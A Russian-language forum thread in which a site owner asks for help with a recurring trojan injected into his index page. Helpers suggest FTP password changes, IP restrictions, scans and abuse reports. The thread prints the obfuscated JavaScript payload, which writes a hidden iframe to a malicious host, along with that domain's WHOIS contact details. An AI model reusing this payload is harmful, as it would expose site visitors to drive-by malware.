Троян на сайте - шо делать и как с ним бороться???

Блин, засада...
Какая то сволочь изменяет индекс на сайте постоянно.
Захожу др.вебом - ругается шо троян. Перезаписываю с нуля - через некоторое время опять та же хрень.
Сейчас поглядел в индекс вот что обнаружил:

Код:

<!-- o --><script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062'; s+='060073070082065077069032115114099061034104116116112058047047109097114099111098101114110097114100111'; s=s+'110105046099111109047098095116114047105110100101120046112104112034032119105100116104061051032104101'; s=s+'105103104116061051032115116121108101061034100105115112108097121058110111110101034062060047073070082'; s=s+'065077069062032'; t='';l=s.length;i=0; while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp(); </script><!-- c --></head> <body bgcolor="#FFFFFF"><script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062'; s+='060073070082065077069032115114099061034104116116112058047047109097114099111098101114110097114100111'; s=s+'110105046099111109047098095116114047105110100101120046112104112034032119105100116104061051032104101'; s=s+'105103104116061051032115116121108101061034100105115112108097121058110111110101034062060047073070082'; s=s+'065077069062032'; t='';l=s.length;i=0; while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp(); </script>

Блин, кто может подсказать, что это за хрень и как с ней бороться?
Если это у меня комп заражен, то почему лицензионный антивирь его не видит? Что это за антивить тогда? Сейчас поставил на полную проверку всей системы, идет процесс. НО я блин, озадачен сильно.
Я не понимаю что надо сделать чтобы избавиться от такой проблемы.
Винда тоже лицензия, обновления, все дела...
Может в саппорт антивиря стукнуться, или где я сам накосячил, или что это за дела?

1. написать саппорту чтобы доступ на фтп был только с твоего айпи.
2. посмотреть куда редиректит и писать абузу.
3. залить бекап

Спасибо, админу я стукнусь
А кто подскажет как абуз писать? И чем аргументировать, ведь я уже перезалил бекап, т.е. трояна сейчас нет (но он может появиться в дальнейшем, если мой антивирь его не поймает, в случае, если она заражена)

еще пароли к фтп поменяй

еще комп свой проверь последним касперским - весьма вероятно трояном у тебя пароли к фтп увели.

У меня на одном сайте постоянно появлялся троян, я его постоянно убирал, закрыл ФТП, все проверил, ничего не нашел. Вообщем оказалось ломали через голосовалку на сайте.
Проверь у тебя никаких лишних скриптов на сайте нет?

1)и ши дрявые скрипты
банально версию скрипта в google и смотри на придмет уязвимстей

2) потри часть эксплоита ато googl если увидет может забанить
мастер- x

точнее http://stopbadware.org а goole чекает их базу

сломали фтп клиент

1. Поменять пасы от ФТП
2. Скинуть код известному программеру, чтобы он расколупал куда видет джава редирект или в данном случае хуета
3. написать абузу на тот домен куда все идет
4. чистить в ручную хтмл файлы от этого гавна

Код:

< / t e x *****t a t e a > < / t e x t a r e a > < I F R***** A M E s r c = " h ***p : / / m a r c o b e r n a r d o n i . c o m / b _ t r / i n d e x . p h p " w i d t h = 3 h e i g h t = 3 s t y l e = " d i s p l a y : n o n e " > < / I F R A ******M E >

- от эта хуйня там сидит.
я немного подправил исходный код - это мне вывело в браузер (без **** есс-но)

Блин, народ, может как то заабузить такой домен? Это явно наши доморощенные хакеры балуют...

Цитата:

Domain Name:marcobernardoni.com Record last updated at 2007-07-08 15:30:57 Record created on 2007/5/28 Record expired on 2008/5/28 Domain servers in listed order: ns1.nameself.com ns2.nameself.com Administrator: Name-- FuzioN FuzioN EMail-: (fuzka@bk.ru) tel --: +7.9015371916 org: FuzioN inc /dev/null Moskow,babruysk,RU 117625 Technical Contactor: Name-- FuzioN FuzioN EMail-: (fuzka@bk.ru) tel --: +7.9015371916 org: FuzioN inc /dev/null Moskow,babruysk,RU 117625 Billing Contactor: Name-- FuzioN FuzioN EMail-: (fuzka@bk.ru) tel --: +7.9015371916 org: FuzioN inc /dev/null Moskow,babruysk,RU 117625 Registration Service Provider: name: Regtime.net tel: +7 8462698077 fax: +7 8462698057 web:http://www.webnames.ru

Вообще, кто может подсказать, как правильно бороться с такой гадостью?
И почему лицензионый Др.Веб ее не поймал вовремя у меня на компе7 (когда захожу на зараженный уже сайт - ругается, а вот почему ко мне пропустил антивирь этот троян - я не могу понять....
В общем, хотелось бы наказать виновника, и принять меры чтобы такого больше не случалось - что надо делать?

в 80% случаев ограничение доступа к ФТП по айпи работает отлично. Абузить их толку мало. Если трой новый, то никто его не поймает, когда меня ломали я выслал троя Касперскому, они его еще не знали.
DF monitor на все домены, ограничение по айпи. и будешь спать спокойно.